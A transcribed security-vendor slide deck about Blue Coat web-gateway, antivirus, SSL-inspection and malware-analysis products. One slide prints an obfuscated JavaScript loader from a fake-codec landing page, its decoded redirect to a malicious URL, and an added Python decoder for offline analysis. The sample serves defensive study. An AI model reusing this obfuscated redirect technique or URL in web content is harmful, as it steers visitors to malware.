BlueCoat products update BlueCoat Systems
BlueCoat products
• Web Security Gateway – Security
  • ProxySG (Proxy Edition)
  • ProxyAV
  • Content Analysis System
  • Malware Analysis Appliance
  • BCWF
  • DLP
  • ProxyClient
  • Reporter
  • Director
• WAN Acceleration – Acceleration
  • ProxySG (M5 Edition)
  • ProxyClient
  • Director
• Application and Network Performance Management - Visibility
  • PacketShaper
  • Intelligence Center
  • Policy Center
• ISP caching
  • CacheFlow
• Modern Advanced Threat Protection - ATP
  • Security Analytics Platform (Solera)
  • SSL Visibility Appliance (Netronome)
  • Malware Analysis Appliance
  • Cloud Services
  • Crossbeam
  • K9
Business Assurance Technology
Centers: Security & Policy Enforcement Center • Mobility Empowerment Center • Trusted Applications Center • Performance Center • Resolution Center
Offerings: Web Gateway & Orchestration (SWG) • Cloud Mobility • Application Management • WAN/Video Optimization • Case Analyst Workflow • SSL Interception • Web Gateway • Mobile Expander • Business Application Enablement • Cache optimization • Vulnerability Expertise Services • Web & Network Protection • Mobile Protection • Shaping • Reporting and Management • ATP Suite
Blue Coat Advanced Threat Protection: ThreatBLADES (WebThreat, MailThreat, FileThreat, Custom Analytics) • SSL Visibility • Malware Analysis • Content Analysis System • Security Analytics Platform by Solera (formerly DeepSee)
Business Assurance Platform • Cloud • 15,000 Customers • 80M Users • VM, Appliance, X-Beam platforms • 33 Worldwide PoP's • 84% of Fortune 500, 90% FedGov
Integrated SSL Visibility: A Complete and Integrated Portfolio of Modern Advanced Threat Protection Solutions
Blue Coat SSL Visibility Appliance • Blocking and Prevention • Malware Analysis Appliance • Blue Coat Malware Analysis Appliance • Blue Coat ProxySG • Content Analysis System • Security Analytics Platform by Solera • ThreatBLADES • Security Analytics Storage • Security Analytics Central Manager • Security Analytics Appliances
You May See Through A Fake AV. But, How About This…

Interesting… (page source of the landing page; the second script block is the obfuscated part)

<script language="javascript"> function dF(s){var s1=unescape(s.substr(0,s.length-1));var t=""; for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write (unescape(t));} </script>
<html><head><title>Install Keys Satellite</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<meta http-equiv="Content-Language" content="en-us" />
<meta name="robots" content="index, follow" />
</head><body bgcolor=#59746>
<script language="javascript">
document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%0D%0A%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%0D%0A%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%0D%0A%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%0D%0A%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%0D%0A%7D%0D%0A%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%264Fepdvnfou/mpdbujpo%264E%2633iuuq%264B00tubcjmjuzjofutdbo/dpn0ijujo/qiq%264Gmboe%264E31%2637bggje%264E27%3A11%2633%264C%264D0tdsjqu%264F1');
</script>
<style> body { font-family: verdana; margin: 10px 100px; } </style>
<h3>Install Keys Satellite</h3>
<strong>install clear xbox controller</strong> <i>install remove lexus power window</i> audio install honda civic 2007 ex <i>install linuxsuse on new computer</i> <u>install electronic diary</u> install cs3 in vista <i>install warehouse shelving</i> <strong>hp deskjet 5550 install software</strong> valve relief chevy piston install <i>install patrol air filter</i> no install lock folders <b>how to install mailbox garage door</b> <font color=#9D17E style="font-size: 

The dF(...) call above writes this redirect into the page …to launch a Fake Codec attack:

<script> document.location="http://stabilityinetscan.com/hitin.php?land=20&affid=169"; </script>
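As an added example (not from the slide deck or from Blue Coat), the following Python re-implements the dF() decoder shown above so that an analyst can recover the redirect offline, without letting a browser execute the page's JavaScript. The only input is the dF(...) argument string copied from the page source on the slide; the function names js_unescape, decode_df and extract_redirect are chosen here and are not part of the sample.

```python
import re
from typing import Optional

# The argument string passed to dF() in the page source shown on the slide.
# It is the only input this script touches; nothing is fetched.
PAGE_PAYLOAD = (
    "%264Dtdsjqu%264Fepdvnfou/mpdbujpo%264E%2633iuuq%264B00tubcjmjuzjofutdbo/dpn0ijujo/qiq"
    "%264Gmboe%264E31%2637bggje%264E27%3A11%2633%264C%264D0tdsjqu%264F1"
)

# Legacy JavaScript unescape() accepts both %XX and %uXXXX escapes.
_PCT = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def js_unescape(s: str) -> str:
    """Mimic legacy JavaScript unescape(): each %XX or %uXXXX becomes one code point.

    urllib.parse.unquote is not a drop-in replacement: it decodes %XX runs as
    UTF-8 bytes and does not understand %uXXXX at all.
    """
    return _PCT.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def decode_df(s: str) -> str:
    """Python equivalent of the page's dF(s).

    dF treats the last character of s as a numeric shift and the rest as a
    percent-encoded string: unescape it, subtract the shift from every code
    point (JS coerces the one-character string to a number), then unescape the
    result a second time before document.write()-ing it.
    """
    shift = int(s[-1])
    s1 = js_unescape(s[:-1])
    # Mask to 16 bits to mirror String.fromCharCode() on a negative value.
    t = "".join(chr((ord(c) - shift) & 0xFFFF) for c in s1)
    return js_unescape(t)


def extract_redirect(markup: str) -> Optional[str]:
    """Return the target of a document.location="..." assignment, or None."""
    m = re.search(r'document\.location\s*=\s*["\']([^"\']+)["\']', markup)
    return m.group(1) if m else None


if __name__ == "__main__":
    decoded = decode_df(PAGE_PAYLOAD)
    print(decoded)
    print("redirect target:", extract_redirect(decoded))
```

Running it recovers the hitin.php redirect that the slide shows in clear text, so a static-analysis or sandbox pipeline can log the destination URL and feed it to the gateway's block list without rendering the page. Applying js_unescape alone to the first document.write() argument yields nothing new: it is just the dF() definition repeated, a common trick to keep the decoder itself out of plain sight.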
Malnet Entry Point: Social Networking
• 1 in 16 malnet attacks come from social networking
• 95% of Internet content types are contained within social networks
• Threat Tactic: Impersonating Friends
• Social Networking: 6.48%
• Business Impact: Granular application & operation controls are required to effectively manage and mitigate the risks of social networking
Anatomy Of A Social Networking Portal: Posts From People You Like • Posts From Friends • Your Friends' Friends • Advertising Content • Vendors • Advertisers • 3rd Party Data • Facebook Apps
Social Networking is the New Threat Vector 48 Million Users Attacked In 1 Second
Bluecoat security solutions: WebPulse cloud analysis • Web Anti-Virus • SSL Proxy (inspection and control of encrypted traffic) • Malware analysis
SWG secure connection control – outbound
Outbound connection control:
• URL filtering and real-time web categorization (Real-time Rating Service)
• Supports multiple web categorization databases, customized local databases, and three databases running concurrently
• BCWF provides multiple categories per URL
• Integrates with Data Loss Prevention (DLP) services via ICAP/ICAPS
• Authentication and authorization per user/group
• Policy enforcement by user/group, location, service, time, content type, etc.
• Protocol access method controls (e.g. HTTP POST, PUT…)
• Certificate Validation controls (e.g. SSL)
Diagram: Internet → ProxySG (URL Filtering, Method Controls, Cert. Validation, AAA Policy, DLP Checks)
SWG secure connection control – inbound
Inbound connection control:
• Signature-based analysis of web objects for potential malware (Kaspersky, Sophos, McAfee, Panda)
• Protocol identification (Protocol over HTTP Detection)
• Web content filtering (attachments, executables, file types, etc.)
• Apparent Data Type & Container Mismatch Detection
• Active content checks (e.g. ActiveX, VB, JavaScript, etc.)
Diagram: Internet → ProxySG (Malware Detection, Data Types, Protocol Compliance, Content Filters, Active Content, URL Filtering, Method Controls, Cert. Validation, AAA Policy, DLP Checks)
SWG management and performance – overall
• Supports default or customized reports and logs
• Object Caching greatly improves access performance
• Object Pipelining & Adaptive Refresh patented technologies
• Bandwidth management (e.g. streaming media)
• Protocol Optimization
Diagram: Internet → ProxySG (Log Files, Reporter, Bandwidth Management, Object Cache, Protocol Optimization, Malware Detection, Data Types, Protocol Compliance, Content Filters, Active Content, URL Filtering, Method Controls, Cert. Validation, AAA Policy, DLP Checks)
Babe-of-the-Day http://apps.facebook.com/babe-oftheday/
Playboy on Facebook http://www.facebook.com/playboy/
Today's websites are complex
Site          | NGFW / UTM URL Rating | Blue Coat Next Gen Filtering
Reuters Video | Video                 | Video & Finance
ESPN Video    | Video                 | Video & Sports
The SAME Value TO BUSINESS?
Granular web application control
• Upload Video • Upload Photo • Post Message • Send Email • Download Attachment • Upload Attachment
• Safe Search: Major Engines supported • Media Search engines as well • Keyword Searches
• Social Networks: Regulate Operations • Restrict abuse
• Multi-media • Publishing • Sharing • Web Mail
Web application controls
• VPM support for web application controls
• Category, application and operation level controls provided
• Infrastructure in place for auto-updating
• Dynamic updates of new applications delivered via WebPulse
• Requires BCWF license to operate
• Application usage reports included in the UI
• Additional reports also available via Reporter
Web application controls
• Available in the Web Access Layer of VPM
• Destination objects created for use in policy for: Request URL Category • Request URL Application • Request URL Operation
Web application controls
• Edit an Application Object: all applications listed • select all or individual apps • find applications that support an operation • find applications by name • selected applications shown • give the object a name to more easily identify it
Web application controls
• Edit an Operation Object: all operations listed • select all or individual ops • find operations by application name • selected operations shown • name it to more easily identify it in policy
Web application controls
• Control App and Op: create a new destination object • select Combined Destination Object • specify the app "and" op
WebPulse provides a negative-day defense mechanism
Where does malware come from? Everywhere!
Five largest Malnets on the Internet • Infrastructure Scales to Support Varying Number of Attacks
Geographic Distribution of Shnakule: map by region (Americas, Western Europe, Eastern Europe & Middle East, Central Asia, East/SE Asia) showing each region's share and change for the malnet components Porn, SEP / Relay, Command & Control, Scams and Malware Servers
The negative day defense
Timeline: -30 Days → 0 Day → +1 Days → +30 Days
• Infrastructure Phase (before 0 Day): new subnet, IP address and host name; domain; exploit server. Negative Day Defense identifies and blocks new components.
• Active Threat Phase (attack begins at 0 Day, attack ends later): dynamic payload changes; UTM policy applied; AV engines begin detection. Negative Day Defense continues to block malnet infrastructure.
Mapping Malnets: Porn • Search Engine Poisoning • Malvertising • Mobile • Phishing
Content and encryption don't matter. Zero-day exploits don't matter. Device type doesn't matter. Attack type doesn't matter.
Real World Results: Benefit Of Adding Network-Based Antimalware to a Secure Web Gateway
Global Financial Enterprise (over 250,000 employees), 12 months ending 4/13:
• 243.21 Billion attempts to access websites (allowed + blocked)
• 793.09 Million attempts to access known malicious sites blocked by WebPulse
• 89,192 malicious files blocked by network perimeter antimalware
Diagram: Enterprise Network – Network Antimalware – Secure Web Gateway – Internet
Drawbacks of deploying AV behind the proxy
• Every object has to be scanned
• The AV engine cannot keep up with the load
• Users resend requests because of the delay
Diagram: Internet – Firewall – Proxy – Anti-virus – Internal Network (Data)
Problems with deploying AV in front of the proxy
• When a new virus appears, infected objects arrive before the AV signature update
• The infected object is stored in the cache server
• When the AV receives a new signature update, it cannot notify the cache server
• The virus keeps spreading through the cache and the attack window widens significantly
Diagram: Internet – Firewall – Anti-virus – Proxy – Internal Network
Advantages of the Bluecoat ProxyAV solution
• Integrates AV engines from multiple vendors, giving customers a choice
• Changing the AV engine requires no hardware change
• Scales out in parallel, protecting the investment (ROI)
• Scan once, serve many times, for better performance
• Specialized in scanning web content (80% of malware infections come from the Web)
Diagram: Internet – ProxySG – ProxyAV / ProxyAV / DLP (via ICAP, ICAP+, S-ICAP) – Enterprise Network
Real-world case
• A Financial Enterprise Deployment
• 20B web requests/month
Firewall → Blue Coat Web Security (Blue Coat ProxySG with Blue Coat WebPulse™: removed 547,000 threats, 98.4%) → Blue Coat ProxyAV (removed 9,000 threats, 1.6%) → Clean; 556,000 threats in total
Benefits of SSL applications
Diagram: Internal Users – Corporate Network – Internet (encrypted SSL tunnel over port 443) – ASP / External Apps
The client and server establish a private, encrypted, on-demand connection over the public Internet.
The bad side of SSL may be… another back door is opened
Diagram: internal users – corporate network – Internet (traffic shown as unreadable ciphertext) – application service provider / external applications
IT staff cannot see at all what traffic is entering and leaving the corporate network.
SSL: the visibility IT staff need in order to manage it
Besides legitimate applications, SSL can also carry malware, leak confidential information, and provide a private channel for uninspected traffic and for non-SSL traffic.
Diagram: Internal Users – Corporate Network – Internet – ASP / External Apps; carried inside SSL: Spyware, Intellectual Property, Worms, Phishing, Viruses, Rogue Apps, Business Apps
Blue Coat: visibility and context (SSL interception handshake)
Client → Proxy: the algorithms I support; connection request.
Proxy → Server: the algorithms I support; connection request.
Server → Proxy: use this algorithm; the server's digital certificate.
Proxy → Client: use this algorithm; an emulated certificate.
Client: verifies the certificate and extracts the (proxy's) public key.
Proxy: verifies the certificate and extracts the server's public key.
Authentication completes on both sides; two tunnels are established: the client – proxy connection and the server – proxy connection.
Security and Policy Enforcement Center: Content Analysis (CAS), Malware Analysis (MAA)
Content Analysis System: Key Components and Packaging
CAS Appliance models: CA-S400-A1, CA-S400-A2, CA-S400-A3, CA-S400-A4 (50 Mbps, 100 Mbps, 250 Mbps and 500 Mbps tiers), or CAS SW
License A: Single AV + Whitelist license (by user)
License B: Dual AV + Whitelist license (by user)
Malware Analysis Appliance (Sandbox): MAA-S400-10 or MAA-S500-10
Malware Analysis NW License
Annual Subscription and Update Service @ 20% of HW List
Intelligent Defense in Depth
• Block Known Web Threats: ProxySG blocks all known sources/malnets and threats before they are on the network
• Allow Known Good: Content Analysis System with Application Whitelisting frees up resources to focus on advanced threat analysis
• Block Known Bad Downloads: Content Analysis System with Malware Scanning reduces threats for incident containment and resolution
• Analyze Unknown Threats: Malware Analysis Appliance discovers new threats and then updates your gateways